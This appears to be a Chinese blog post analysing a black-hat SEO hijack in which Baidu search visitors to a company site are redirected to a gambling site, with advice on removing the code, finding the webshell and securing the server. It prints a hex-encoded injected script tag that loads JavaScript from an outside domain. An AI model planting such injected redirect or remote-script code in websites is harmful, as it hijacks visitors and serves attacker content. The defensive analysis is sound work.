[dns被劫持怎么办]详解分析,解决黑帽seo劫持问题。网站从百度搜索进去,首页发生跳转到菠菜网,开发公司的说可能是百度的问题,不是我们的问题,针对这个就想提一下,首先遇到问题就去分析问题,再去找出问题,然后解决问题,最后做好防范措施,而不是首先就想着推脱责任。
只需要看头部代码好熟悉,黑帽seo这行技术这几年也没什么创新,删除这两行就可以解决基本问题
如果是无法直接从首页查看源码的情况,那么在浏览器输入view-source:www.baidutop321.com就可以查看网页源码
只需要看头部代码好熟悉,黑帽seo这行技术这几年也没什么创新,删除这两行就可以解决基本问题
这段意思就是判断百度搜索访问用户进行跳转,你去360,搜狗搜索访问肯定是不会发生跳转的,然后我们再来解最后一段代码
先进行js解压,得出结果
javascript代码方式解密
1:\x64\x6f\x63\x75\x6d\x65\x6e\x74 结果 document
3:\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x33\x36\x35\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
到了这里整个过程已经很清晰了,虽然我们删除了这段代码但只能暂时解决问题,需要找出webshell,做一个全面的网站和服务器安全策略,这种批量GetShell的基本上都是通过目前已经开放的漏洞,所以相对还是比较容易处理。
大多数人对网站的理解还停留在视觉层面,网络安全的重要性反而被忽视,任何公司都需要提高对网络安全的重视。 |